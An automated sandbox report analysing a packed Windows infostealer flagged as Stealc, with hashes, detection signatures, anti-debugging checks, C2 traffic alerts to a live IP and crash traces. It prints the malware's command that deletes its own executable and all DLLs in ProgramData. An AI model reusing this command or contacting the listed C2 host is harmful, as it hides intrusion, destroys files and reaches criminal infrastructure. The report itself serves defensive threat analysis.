Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	Sept. 30, 2024, 11:19 a.m.	Sept. 30, 2024, 11:22 a.m.

Size	1.8MB
Type	PE32 executable (GUI) Intel 80386, for MS Windows
MD5	`73ce03e3c27ea3475814c6dbad0cdccb`
SHA256	`f317d011efe739b606b000bb981466f81e14fe2b600f3dd72bbd2b16c881bbbc`
CRC32	`D0D987D9`
ssdeep	`49152:44hapWUK36D5SDj8OyySXwqAKtsJpEzMk:446WUpD5hySXHAzEZ`
Yara	themida_packer - themida packer PE_Header_Zero - PE File Signature anti_vm_detect - Possibly employs anti-virtualization techniques IsPE32 - (no description)

66f6b6b7f2ec8_intro.exe "C:\Users\test22\AppData\Local\Temp\66f6b6b7f2ec8_intro.exe"
1680
- cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\test22\AppData\Local\Temp\66f6b6b7f2ec8_intro.exe" & del "C:\ProgramData\*.dll"" & exit
  2544
  - timeout.exe timeout /t 5
    2632

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
185.215.113.37	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 185.215.113.37:80 -> 192.168.56.103:49161	2400031	ET DROP Spamhaus DROP Listed Traffic Inbound group 32	Misc Attack
TCP 192.168.56.103:49161 -> 185.215.113.37:80	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	Malware Command and Control Activity Detected
TCP 192.168.56.103:49161 -> 185.215.113.37:80	2044244	ET MALWARE Win32/Stealc Requesting browsers Config from C2	Malware Command and Control Activity Detected
TCP 185.215.113.37:80 -> 192.168.56.103:49161	2051828	ET MALWARE Win32/Stealc Active C2 Responding with browsers Config M1	Malware Command and Control Activity Detected
TCP 192.168.56.103:49161 -> 185.215.113.37:80	2044246	ET MALWARE Win32/Stealc Requesting plugins Config from C2	Malware Command and Control Activity Detected
TCP 185.215.113.37:80 -> 192.168.56.103:49161	2051831	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1	Malware Command and Control Activity Detected
TCP 192.168.56.103:49161 -> 185.215.113.37:80	2044248	ET MALWARE Win32/Stealc Submitting System Information to C2	Malware Command and Control Activity Detected
TCP 192.168.56.103:49161 -> 185.215.113.37:80	2027250	ET INFO Dotted Quad Host DLL Request	Potentially Bad Traffic
TCP 192.168.56.103:49161 -> 185.215.113.37:80	2044301	ET HUNTING HTTP GET Request for sqlite3.dll - Possible Infostealer Activity	A suspicious filename was detected
TCP 185.215.113.37:80 -> 192.168.56.103:49161	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 185.215.113.37:80 -> 192.168.56.103:49161	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 192.168.56.103:49164 -> 185.215.113.37:80	2027250	ET INFO Dotted Quad Host DLL Request	Potentially Bad Traffic
TCP 192.168.56.103:49164 -> 185.215.113.37:80	2044303	ET HUNTING HTTP GET Request for freebl3.dll - Possible Infostealer Activity	A suspicious filename was detected
TCP 185.215.113.37:80 -> 192.168.56.103:49164	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 185.215.113.37:80 -> 192.168.56.103:49164	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 192.168.56.103:49164 -> 185.215.113.37:80	2027250	ET INFO Dotted Quad Host DLL Request	Potentially Bad Traffic
TCP 192.168.56.103:49164 -> 185.215.113.37:80	2044302	ET HUNTING HTTP GET Request for mozglue.dll - Possible Infostealer Activity	A suspicious filename was detected
TCP 185.215.113.37:80 -> 192.168.56.103:49164	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 192.168.56.103:49164 -> 185.215.113.37:80	2027250	ET INFO Dotted Quad Host DLL Request	Potentially Bad Traffic
TCP 192.168.56.103:49164 -> 185.215.113.37:80	2027250	ET INFO Dotted Quad Host DLL Request	Potentially Bad Traffic
TCP 192.168.56.103:49164 -> 185.215.113.37:80	2044305	ET HUNTING HTTP GET Request for nss3.dll - Possible Infostealer Activity	A suspicious filename was detected
TCP 192.168.56.103:49164 -> 185.215.113.37:80	2027250	ET INFO Dotted Quad Host DLL Request	Potentially Bad Traffic
TCP 192.168.56.103:49164 -> 185.215.113.37:80	2044306	ET HUNTING HTTP GET Request for softokn3.dll - Possible Infostealer Activity	A suspicious filename was detected
TCP 192.168.56.103:49164 -> 185.215.113.37:80	2027250	ET INFO Dotted Quad Host DLL Request	Potentially Bad Traffic
TCP 192.168.56.103:49164 -> 185.215.113.37:80	2044307	ET HUNTING HTTP GET Request for vcruntime140.dll - Possible Infostealer Activity	A suspicious filename was detected

Suricata TLS

No Suricata TLS

Queries for the computername (3 events)

Time & API	Arguments	Status	Return
GetComputerNameA Sept. 30, 2024, 11:19 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Sept. 30, 2024, 11:19 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Sept. 30, 2024, 11:19 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (7 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Sept. 30, 2024, 11:19 a.m.			0	0
IsDebuggerPresent Sept. 30, 2024, 11:19 a.m.			0	0
IsDebuggerPresent Sept. 30, 2024, 11:19 a.m.			0	0
IsDebuggerPresent Sept. 30, 2024, 11:19 a.m.			0	0
IsDebuggerPresent Sept. 30, 2024, 11:19 a.m.			0	0
IsDebuggerPresent Sept. 30, 2024, 11:19 a.m.			0	0
IsDebuggerPresent Sept. 30, 2024, 11:19 a.m.			0	0

Command line console output was observed (3 events)

Time & API	Arguments	Status	Return
WriteConsoleW Sept. 30, 2024, 11:20 a.m.	buffer: Could Not Find C:\ProgramData\*.dll & exit console_handle: 0x0000000b	1	1
WriteConsoleW Sept. 30, 2024, 11:19 a.m.	buffer: Waiting for 5 console_handle: 0x00000007	1	1
WriteConsoleW Sept. 30, 2024, 11:19 a.m.	buffer: seconds, press a key to continue ... console_handle: 0x00000007	1	1

Tries to locate where the browsers are installed (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Sept. 30, 2024, 11:19 a.m.		1	1	0

The executable contains unknown PE section names indicative of a packer (could be a false positive) (7 events)

section	\x00
section	.rsrc
section	.idata
section
section	zxnwjsqe
section	cqaoqfhz
section	.taggant

One or more processes crashed (50 out of 116 events)

Time & API	Arguments	Status
__exception__ Sept. 30, 2024, 11:19 a.m.	stacktrace: RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: fb e9 4e 01 00 00 60 8b 74 24 24 8b 7c 24 28 fc exception.symbol: 66f6b6b7f2ec8_intro+0x4fa0b9 exception.instruction: sti exception.module: 66f6b6b7f2ec8_intro.exe exception.exception_code: 0xc0000096 exception.offset: 5218489 exception.address: 0x169a0b9 registers.esp: 2096740 registers.edi: 0 registers.eax: 1 registers.ebp: 2096756 registers.edx: 25391104 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0	1
__exception__ Sept. 30, 2024, 11:19 a.m.	stacktrace: exception.instruction_r: fb 51 b9 3d 8e fd 7b 01 cf 59 e9 88 fb ff ff 50 exception.symbol: 66f6b6b7f2ec8_intro+0x260365 exception.instruction: sti exception.module: 66f6b6b7f2ec8_intro.exe exception.exception_code: 0xc0000096 exception.offset: 2491237 exception.address: 0x1400365 registers.esp: 2096704 registers.edi: 20970765 registers.eax: 28171 registers.ebp: 4010991636 registers.edx: 18481152 registers.ebx: 1971191808 registers.esi: 3 registers.ecx: 1971388416	1
__exception__ Sept. 30, 2024, 11:19 a.m.	stacktrace: exception.instruction_r: fb 51 52 ba 16 7f af 7f 89 d1 e9 33 fb ff ff 81 exception.symbol: 66f6b6b7f2ec8_intro+0x26022d exception.instruction: sti exception.module: 66f6b6b7f2ec8_intro.exe exception.exception_code: 0xc0000096 exception.offset: 2490925 exception.address: 0x140022d registers.esp: 2096708 registers.edi: 20998936 registers.eax: 28171 registers.ebp: 4010991636 registers.edx: 18481152 registers.ebx: 4294941720 registers.esi: 3 registers.ecx: 234729	1
__exception__ Sept. 30, 2024, 11:19 a.m.	stacktrace: exception.instruction_r: fb e9 a0 02 00 00 8b 34 24 e9 89 fc ff ff 09 d5 exception.symbol: 66f6b6b7f2ec8_intro+0x261241 exception.instruction: sti exception.module: 66f6b6b7f2ec8_intro.exe exception.exception_code: 0xc0000096 exception.offset: 2495041 exception.address: 0x1401241 registers.esp: 2096708 registers.edi: 20998936 registers.eax: 21005402 registers.ebp: 4010991636 registers.edx: 1484757682 registers.ebx: 4294941720 registers.esi: 3 registers.ecx: 234729	1
__exception__ Sept. 30, 2024, 11:19 a.m.	stacktrace: exception.instruction_r: fb 81 ec 04 00 00 00 89 0c 24 e9 15 ff ff ff 81 exception.symbol: 66f6b6b7f2ec8_intro+0x261025 exception.instruction: sti exception.module: 66f6b6b7f2ec8_intro.exe exception.exception_code: 0xc0000096 exception.offset: 2494501 exception.address: 0x1401025 registers.esp: 2096708 registers.edi: 0 registers.eax: 20977842 registers.ebp: 4010991636 registers.edx: 1484757682 registers.ebx: 4294941720 registers.esi: 3 registers.ecx: 1259	1
__exception__ Sept. 30, 2024, 11:19 a.m.	stacktrace: exception.instruction_r: fb 51 54 8b 0c 24 81 c4 04 00 00 00 81 c1 04 00 exception.symbol: 66f6b6b7f2ec8_intro+0x3dbc3b exception.instruction: sti exception.module: 66f6b6b7f2ec8_intro.exe exception.exception_code: 0xc0000096 exception.offset: 4045883 exception.address: 0x157bc3b registers.esp: 2096708 registers.edi: 21009692 registers.eax: 32899 registers.ebp: 4010991636 registers.edx: 2130566132 registers.ebx: 561385 registers.esi: 0 registers.ecx: 22527139	1
__exception__ Sept. 30, 2024, 11:19 a.m.	stacktrace: exception.instruction_r: fb 52 89 0c 24 c7 04 24 8e 8d 64 2e 89 14 24 68 exception.symbol: 66f6b6b7f2ec8_intro+0x3dcb2c exception.instruction: sti exception.module: 66f6b6b7f2ec8_intro.exe exception.exception_code: 0xc0000096 exception.offset: 4049708 exception.address: 0x157cb2c registers.esp: 2096708 registers.edi: 21009692 registers.eax: 27296 registers.ebp: 4010991636 registers.edx: 22557816 registers.ebx: 312066969 registers.esi: 0 registers.ecx: 1857587880	1
__exception__ Sept. 30, 2024, 11:19 a.m.	stacktrace: exception.instruction_r: fb e9 90 02 00 00 31 1c 24 33 1c 24 8b 24 24 68 exception.symbol: 66f6b6b7f2ec8_intro+0x3dcdc9 exception.instruction: sti exception.module: 66f6b6b7f2ec8_intro.exe exception.exception_code: 0xc0000096 exception.offset: 4050377 exception.address: 0x157cdc9 registers.esp: 2096708 registers.edi: 21009692 registers.eax: 27296 registers.ebp: 4010991636 registers.edx: 22533204 registers.ebx: 0 registers.esi: 0 registers.ecx: 50665	1
__exception__ Sept. 30, 2024, 11:19 a.m.	stacktrace: exception.instruction_r: fb 51 b9 87 b6 fe 7f 53 e9 e3 04 00 00 5f 01 d0 exception.symbol: 66f6b6b7f2ec8_intro+0x3e2200 exception.instruction: sti exception.module: 66f6b6b7f2ec8_intro.exe exception.exception_code: 0xc0000096 exception.offset: 4071936 exception.address: 0x1582200 registers.esp: 2096704 registers.edi: 42719 registers.eax: 26446 registers.ebp: 4010991636 registers.edx: 22553015 registers.ebx: 22535193 registers.esi: 45240 registers.ecx: 14288	1
__exception__ Sept. 30, 2024, 11:19 a.m.	stacktrace: exception.instruction_r: fb 68 c8 02 77 4b 89 04 24 e9 64 07 00 00 81 04 exception.symbol: 66f6b6b7f2ec8_intro+0x3e23d8 exception.instruction: sti exception.module: 66f6b6b7f2ec8_intro.exe exception.exception_code: 0xc0000096 exception.offset: 4072408 exception.address: 0x15823d8 registers.esp: 2096708 registers.edi: 42719 registers.eax: 26446 registers.ebp: 4010991636 registers.edx: 22579461 registers.ebx: 22535193 registers.esi: 45240 registers.ecx: 14288	1
__exception__ Sept. 30, 2024, 11:19 a.m.	stacktrace: exception.instruction_r: fb 68 52 47 4c 2a 89 04 24 52 51 e9 51 fd ff ff exception.symbol: 66f6b6b7f2ec8_intro+0x3e289f exception.instruction: sti exception.module: 66f6b6b7f2ec8_intro.exe exception.exception_code: 0xc0000096 exception.offset: 4073631 exception.address: 0x158289f registers.esp: 2096708 registers.edi: 1259 registers.eax: 26446 registers.ebp: 4010991636 registers.edx: 22555689 registers.ebx: 22535193 registers.esi: 45240 registers.ecx: 0	1
__exception__ Sept. 30, 2024, 11:19 a.m.	stacktrace: exception.instruction_r: ed 64 8f 05 00 00 00 00 52 89 e2 e9 59 fe ff ff exception.symbol: 66f6b6b7f2ec8_intro+0x3e9ec7 exception.instruction: in eax, dx exception.module: 66f6b6b7f2ec8_intro.exe exception.exception_code: 0xc0000096 exception.offset: 4103879 exception.address: 0x1589ec7 registers.esp: 2096700 registers.edi: 4075221 registers.eax: 1447909480 registers.ebp: 4010991636 registers.edx: 22104 registers.ebx: 1971327157 registers.esi: 22570005 registers.ecx: 20	1
__exception__ Sept. 30, 2024, 11:19 a.m.	stacktrace: exception.instruction_r: 0f 3f 07 0b 64 8f 05 00 00 00 00 83 c4 04 83 fb exception.symbol: 66f6b6b7f2ec8_intro+0x3e8eb8 exception.address: 0x1588eb8 exception.module: 66f6b6b7f2ec8_intro.exe exception.exception_code: 0xc000001d exception.offset: 4099768 registers.esp: 2096700 registers.edi: 4075221 registers.eax: 1 registers.ebp: 4010991636 registers.edx: 22104 registers.ebx: 0 registers.esi: 22570005 registers.ecx: 20	1
__exception__ Sept. 30, 2024, 11:19 a.m.	stacktrace: exception.instruction_r: ed 81 fb 68 58 4d 56 75 0a c7 85 e1 29 2d 12 01 exception.symbol: 66f6b6b7f2ec8_intro+0x3ea9c5 exception.instruction: in eax, dx exception.module: 66f6b6b7f2ec8_intro.exe exception.exception_code: 0xc0000096 exception.offset: 4106693 exception.address: 0x158a9c5 registers.esp: 2096700 registers.edi: 4075221 registers.eax: 1447909480 registers.ebp: 4010991636 registers.edx: 22104 registers.ebx: 2256917605 registers.esi: 22570005 registers.ecx: 10	1
__exception__ Sept. 30, 2024, 11:19 a.m.	stacktrace: exception.instruction_r: fb 51 e9 b4 fc ff ff 81 ef 04 00 00 00 87 3c 24 exception.symbol: 66f6b6b7f2ec8_intro+0x3ef730 exception.instruction: sti exception.module: 66f6b6b7f2ec8_intro.exe exception.exception_code: 0xc0000096 exception.offset: 4126512 exception.address: 0x158f730 registers.esp: 2096708 registers.edi: 4075221 registers.eax: 22633997 registers.ebp: 4010991636 registers.edx: 2130566132 registers.ebx: 977248 registers.esi: 10 registers.ecx: 4294941236	1
__exception__ Sept. 30, 2024, 11:19 a.m.	stacktrace: exception.instruction_r: cd 01 eb 00 66 be 9c 5c 80 ce b0 64 8f 05 00 00 exception.symbol: 66f6b6b7f2ec8_intro+0x3efa97 exception.instruction: int 1 exception.module: 66f6b6b7f2ec8_intro.exe exception.exception_code: 0xc0000005 exception.offset: 4127383 exception.address: 0x158fa97 registers.esp: 2096668 registers.edi: 0 registers.eax: 2096668 registers.ebp: 4010991636 registers.edx: 228786569 registers.ebx: 22608794 registers.esi: 228786569 registers.ecx: 37928074	1
__exception__ Sept. 30, 2024, 11:19 a.m.	stacktrace: exception.instruction_r: fb 55 bd 76 a6 cd 7f 81 c1 61 4e ef 7e e9 db f8 exception.symbol: 66f6b6b7f2ec8_intro+0x3f7031 exception.instruction: sti exception.module: 66f6b6b7f2ec8_intro.exe exception.exception_code: 0xc0000096 exception.offset: 4157489 exception.address: 0x1597031 registers.esp: 2096704 registers.edi: 4075221 registers.eax: 28076 registers.ebp: 4010991636 registers.edx: 22604480 registers.ebx: 977248 registers.esi: 64801 registers.ecx: 22636035	1
__exception__ Sept. 30, 2024, 11:19 a.m.	stacktrace: exception.instruction_r: fb 51 c7 04 24 dc 03 90 1f 81 2c 24 a1 f0 c4 7e exception.symbol: 66f6b6b7f2ec8_intro+0x3f6e55 exception.instruction: sti exception.module: 66f6b6b7f2ec8_intro.exe exception.exception_code: 0xc0000096 exception.offset: 4157013 exception.address: 0x1596e55 registers.esp: 2096708 registers.edi: 4075221 registers.eax: 28076 registers.ebp: 4010991636 registers.edx: 22604480 registers.ebx: 977248 registers.esi: 64801 registers.ecx: 22664111	1
__exception__ Sept. 30, 2024, 11:19 a.m.	stacktrace: exception.instruction_r: fb 56 89 0c 24 e9 22 03 00 00 89 3c 24 52 89 34 exception.symbol: 66f6b6b7f2ec8_intro+0x3f6825 exception.instruction: sti exception.module: 66f6b6b7f2ec8_intro.exe exception.exception_code: 0xc0000096 exception.offset: 4155429 exception.address: 0x1596825 registers.esp: 2096708 registers.edi: 2298801283 registers.eax: 4294942252 registers.ebp: 4010991636 registers.edx: 22604480 registers.ebx: 977248 registers.esi: 64801 registers.ecx: 22664111	1
__exception__ Sept. 30, 2024, 11:19 a.m.	stacktrace: exception.instruction_r: fb 68 70 b2 50 3f 89 04 24 55 c7 04 24 00 d8 6f exception.symbol: 66f6b6b7f2ec8_intro+0x403014 exception.instruction: sti exception.module: 66f6b6b7f2ec8_intro.exe exception.exception_code: 0xc0000096 exception.offset: 4206612 exception.address: 0x15a3014 registers.esp: 2096700 registers.edi: 20968718 registers.eax: 29948 registers.ebp: 4010991636 registers.edx: 6 registers.ebx: 22716887 registers.esi: 1971262480 registers.ecx: 0	1
__exception__ Sept. 30, 2024, 11:19 a.m.	stacktrace: exception.instruction_r: fb 55 bd d1 f7 cf 3b e9 b2 fe ff ff 55 bd c8 22 exception.symbol: 66f6b6b7f2ec8_intro+0x4032d7 exception.instruction: sti exception.module: 66f6b6b7f2ec8_intro.exe exception.exception_code: 0xc0000096 exception.offset: 4207319 exception.address: 0x15a32d7 registers.esp: 2096700 registers.edi: 20968718 registers.eax: 29948 registers.ebp: 4010991636 registers.edx: 6 registers.ebx: 22689739 registers.esi: 0 registers.ecx: 605325649	1
__exception__ Sept. 30, 2024, 11:19 a.m.	stacktrace: exception.instruction_r: fb 29 d2 51 89 1c 24 81 ec 04 00 00 00 89 04 24 exception.symbol: 66f6b6b7f2ec8_intro+0x4039bb exception.instruction: sti exception.module: 66f6b6b7f2ec8_intro.exe exception.exception_code: 0xc0000096 exception.offset: 4209083 exception.address: 0x15a39bb registers.esp: 2096700 registers.edi: 20968718 registers.eax: 22718037 registers.ebp: 4010991636 registers.edx: 374104935 registers.ebx: 22689739 registers.esi: 0 registers.ecx: 605325649	1
__exception__ Sept. 30, 2024, 11:19 a.m.	stacktrace: exception.instruction_r: fb e9 85 fc ff ff 31 2c 24 33 2c 24 5c e9 73 00 exception.symbol: 66f6b6b7f2ec8_intro+0x403eef exception.instruction: sti exception.module: 66f6b6b7f2ec8_intro.exe exception.exception_code: 0xc0000096 exception.offset: 4210415 exception.address: 0x15a3eef registers.esp: 2096700 registers.edi: 20968718 registers.eax: 22718037 registers.ebp: 4010991636 registers.edx: 4294941852 registers.ebx: 22689739 registers.esi: 0 registers.ecx: 604275024	1
__exception__ Sept. 30, 2024, 11:19 a.m.	stacktrace: exception.instruction_r: fb 29 f6 ff 34 32 81 2c 24 df a5 ff 7b 8b 04 24 exception.symbol: 66f6b6b7f2ec8_intro+0x40bf93 exception.instruction: sti exception.module: 66f6b6b7f2ec8_intro.exe exception.exception_code: 0xc0000096 exception.offset: 4243347 exception.address: 0x15abf93 registers.esp: 2096700 registers.edi: 3995931930 registers.eax: 28160 registers.ebp: 4010991636 registers.edx: 22750375 registers.ebx: 4018100155 registers.esi: 20968718 registers.ecx: 779223040	1
__exception__ Sept. 30, 2024, 11:19 a.m.	stacktrace: exception.instruction_r: fb 81 ec 04 00 00 00 89 1c 24 55 89 34 24 c7 04 exception.symbol: 66f6b6b7f2ec8_intro+0x40bb06 exception.instruction: sti exception.module: 66f6b6b7f2ec8_intro.exe exception.exception_code: 0xc0000096 exception.offset: 4242182 exception.address: 0x15abb06 registers.esp: 2096700 registers.edi: 3995931930 registers.eax: 30185 registers.ebp: 4010991636 registers.edx: 22750375 registers.ebx: 4018100155 registers.esi: 4294941764 registers.ecx: 779223040	1
__exception__ Sept. 30, 2024, 11:19 a.m.	stacktrace: exception.instruction_r: fb 51 b9 00 4d fb 77 50 b8 14 df 1f 50 81 eb 7b exception.symbol: 66f6b6b7f2ec8_intro+0x426653 exception.instruction: sti exception.module: 66f6b6b7f2ec8_intro.exe exception.exception_code: 0xc0000096 exception.offset: 4351571 exception.address: 0x15c6653 registers.esp: 2096664 registers.edi: 1978756991 registers.eax: 27434 registers.ebp: 4010991636 registers.edx: 2130566132 registers.ebx: 22831648 registers.esi: 22826614 registers.ecx: 779223040	1
__exception__ Sept. 30, 2024, 11:19 a.m.	stacktrace: exception.instruction_r: fb 81 ec 04 00 00 00 89 04 24 e9 0e 00 00 00 53 exception.symbol: 66f6b6b7f2ec8_intro+0x426b5f exception.instruction: sti exception.module: 66f6b6b7f2ec8_intro.exe exception.exception_code: 0xc0000096 exception.offset: 4352863 exception.address: 0x15c6b5f registers.esp: 2096668 registers.edi: 1978756991 registers.eax: 27434 registers.ebp: 4010991636 registers.edx: 2130566132 registers.ebx: 22859082 registers.esi: 22826614 registers.ecx: 779223040	1
__exception__ Sept. 30, 2024, 11:19 a.m.	stacktrace: exception.instruction_r: fb 50 52 e9 07 02 00 00 5f 81 34 24 10 c6 fd d3 exception.symbol: 66f6b6b7f2ec8_intro+0x4266fd exception.instruction: sti exception.module: 66f6b6b7f2ec8_intro.exe exception.exception_code: 0xc0000096 exception.offset: 4351741 exception.address: 0x15c66fd registers.esp: 2096668 registers.edi: 0 registers.eax: 604277074 registers.ebp: 4010991636 registers.edx: 2130566132 registers.ebx: 22834766 registers.esi: 22826614 registers.ecx: 779223040	1
__exception__ Sept. 30, 2024, 11:19 a.m.	stacktrace: exception.instruction_r: fb 51 56 51 89 e1 81 c1 04 00 00 00 81 e9 04 00 exception.symbol: 66f6b6b7f2ec8_intro+0x4271db exception.instruction: sti exception.module: 66f6b6b7f2ec8_intro.exe exception.exception_code: 0xc0000096 exception.offset: 4354523 exception.address: 0x15c71db registers.esp: 2096668 registers.edi: 0 registers.eax: 26685 registers.ebp: 4010991636 registers.edx: 1231615538 registers.ebx: 22834766 registers.esi: 22826614 registers.ecx: 22861875	1
__exception__ Sept. 30, 2024, 11:19 a.m.	stacktrace: exception.instruction_r: fb 51 89 04 24 c7 04 24 7b a4 1f 42 89 14 24 56 exception.symbol: 66f6b6b7f2ec8_intro+0x427423 exception.instruction: sti exception.module: 66f6b6b7f2ec8_intro.exe exception.exception_code: 0xc0000096 exception.offset: 4355107 exception.address: 0x15c7423 registers.esp: 2096668 registers.edi: 496839008 registers.eax: 26685 registers.ebp: 4010991636 registers.edx: 1231615538 registers.ebx: 22834766 registers.esi: 4294943388 registers.ecx: 22861875	1
__exception__ Sept. 30, 2024, 11:19 a.m.	stacktrace: exception.instruction_r: fb e9 d3 02 00 00 58 5b 40 55 51 68 92 4b 5f 6d exception.symbol: 66f6b6b7f2ec8_intro+0x4288d6 exception.instruction: sti exception.module: 66f6b6b7f2ec8_intro.exe exception.exception_code: 0xc0000096 exception.offset: 4360406 exception.address: 0x15c88d6 registers.esp: 2096668 registers.edi: 22840716 registers.eax: 33002 registers.ebp: 4010991636 registers.edx: 1231615538 registers.ebx: 22820158 registers.esi: 22839888 registers.ecx: 22874118	1
__exception__ Sept. 30, 2024, 11:19 a.m.	stacktrace: exception.instruction_r: fb 68 13 02 43 3c 89 14 24 e9 60 01 00 00 8b 1c exception.symbol: 66f6b6b7f2ec8_intro+0x428fa6 exception.instruction: sti exception.module: 66f6b6b7f2ec8_intro.exe exception.exception_code: 0xc0000096 exception.offset: 4362150 exception.address: 0x15c8fa6 registers.esp: 2096668 registers.edi: 22840716 registers.eax: 33002 registers.ebp: 4010991636 registers.edx: 1231615538 registers.ebx: 4294937388 registers.esi: 1364611669 registers.ecx: 22874118	1
__exception__ Sept. 30, 2024, 11:19 a.m.	stacktrace: exception.instruction_r: fb 68 00 dc 13 1c e9 7a 00 00 00 b8 3e d1 22 6a exception.symbol: 66f6b6b7f2ec8_intro+0x429e56 exception.instruction: sti exception.module: 66f6b6b7f2ec8_intro.exe exception.exception_code: 0xc0000096 exception.offset: 4365910 exception.address: 0x15c9e56 registers.esp: 2096668 registers.edi: 22840716 registers.eax: 22872571 registers.ebp: 4010991636 registers.edx: 1731662083 registers.ebx: 4294937388 registers.esi: 1364611669 registers.ecx: 22874118	1
__exception__ Sept. 30, 2024, 11:19 a.m.	stacktrace: exception.instruction_r: fb 50 c7 04 24 40 b0 ef 7b 81 0c 24 38 bb ff 3f exception.symbol: 66f6b6b7f2ec8_intro+0x42a13a exception.instruction: sti exception.module: 66f6b6b7f2ec8_intro.exe exception.exception_code: 0xc0000096 exception.offset: 4366650 exception.address: 0x15ca13a registers.esp: 2096668 registers.edi: 22840716 registers.eax: 22872571 registers.ebp: 4010991636 registers.edx: 575214952 registers.ebx: 4294937388 registers.esi: 1364611669 registers.ecx: 4294942564	1
__exception__ Sept. 30, 2024, 11:19 a.m.	stacktrace: exception.instruction_r: fb 68 8b 76 44 1a 89 3c 24 89 04 24 e9 19 01 00 exception.symbol: 66f6b6b7f2ec8_intro+0x42df84 exception.instruction: sti exception.module: 66f6b6b7f2ec8_intro.exe exception.exception_code: 0xc0000096 exception.offset: 4382596 exception.address: 0x15cdf84 registers.esp: 2096664 registers.edi: 22840716 registers.eax: 31083 registers.ebp: 4010991636 registers.edx: 22863296 registers.ebx: 20974245 registers.esi: 1364611669 registers.ecx: 1969225870	1
__exception__ Sept. 30, 2024, 11:19 a.m.	stacktrace: exception.instruction_r: fb e9 88 05 00 00 89 2c 24 53 c7 04 24 77 47 5f exception.symbol: 66f6b6b7f2ec8_intro+0x42e0a8 exception.instruction: sti exception.module: 66f6b6b7f2ec8_intro.exe exception.exception_code: 0xc0000096 exception.offset: 4382888 exception.address: 0x15ce0a8 registers.esp: 2096668 registers.edi: 22840716 registers.eax: 31083 registers.ebp: 4010991636 registers.edx: 22894379 registers.ebx: 20974245 registers.esi: 1364611669 registers.ecx: 1969225870	1
__exception__ Sept. 30, 2024, 11:19 a.m.	stacktrace: exception.instruction_r: fb 57 89 e7 81 c7 04 00 00 00 83 ef 04 87 3c 24 exception.symbol: 66f6b6b7f2ec8_intro+0x42dff8 exception.instruction: sti exception.module: 66f6b6b7f2ec8_intro.exe exception.exception_code: 0xc0000096 exception.offset: 4382712 exception.address: 0x15cdff8 registers.esp: 2096668 registers.edi: 22840716 registers.eax: 31083 registers.ebp: 4010991636 registers.edx: 22894379 registers.ebx: 20974245 registers.esi: 85481 registers.ecx: 4294938756	1
__exception__ Sept. 30, 2024, 11:19 a.m.	stacktrace: exception.instruction_r: fb 56 52 89 0c 24 89 04 24 51 c7 04 24 f2 4d ef exception.symbol: 66f6b6b7f2ec8_intro+0x430eaf exception.instruction: sti exception.module: 66f6b6b7f2ec8_intro.exe exception.exception_code: 0xc0000096 exception.offset: 4394671 exception.address: 0x15d0eaf registers.esp: 2096668 registers.edi: 81129 registers.eax: 28525 registers.ebp: 4010991636 registers.edx: 4294941596 registers.ebx: 38638849 registers.esi: 22902476 registers.ecx: 1054145177	1
__exception__ Sept. 30, 2024, 11:19 a.m.	stacktrace: exception.instruction_r: fb 31 db e9 6e 00 00 00 01 d1 5a 87 0c 24 8b 24 exception.symbol: 66f6b6b7f2ec8_intro+0x4320c0 exception.instruction: sti exception.module: 66f6b6b7f2ec8_intro.exe exception.exception_code: 0xc0000096 exception.offset: 4399296 exception.address: 0x15d20c0 registers.esp: 2096668 registers.edi: 81129 registers.eax: 31725 registers.ebp: 4010991636 registers.edx: 75938910 registers.ebx: 785844480 registers.esi: 22902476 registers.ecx: 22911196	1
__exception__ Sept. 30, 2024, 11:19 a.m.	stacktrace: exception.instruction_r: fb 56 50 55 c7 04 24 c9 09 f3 56 51 b9 98 30 24 exception.symbol: 66f6b6b7f2ec8_intro+0x4326db exception.instruction: sti exception.module: 66f6b6b7f2ec8_intro.exe exception.exception_code: 0xc0000096 exception.offset: 4400859 exception.address: 0x15d26db registers.esp: 2096668 registers.edi: 3131996008 registers.eax: 31725 registers.ebp: 4010991636 registers.edx: 75938910 registers.ebx: 4294938344 registers.esi: 22902476 registers.ecx: 22911196	1
__exception__ Sept. 30, 2024, 11:19 a.m.	stacktrace: exception.instruction_r: fb e9 7a f8 ff ff 03 0c 24 e9 d4 fb ff ff 8b 14 exception.symbol: 66f6b6b7f2ec8_intro+0x43356d exception.instruction: sti exception.module: 66f6b6b7f2ec8_intro.exe exception.exception_code: 0xc0000096 exception.offset: 4404589 exception.address: 0x15d356d registers.esp: 2096664 registers.edi: 3131996008 registers.eax: 31630 registers.ebp: 4010991636 registers.edx: 75938910 registers.ebx: 4294938344 registers.esi: 22902476 registers.ecx: 22882612	1
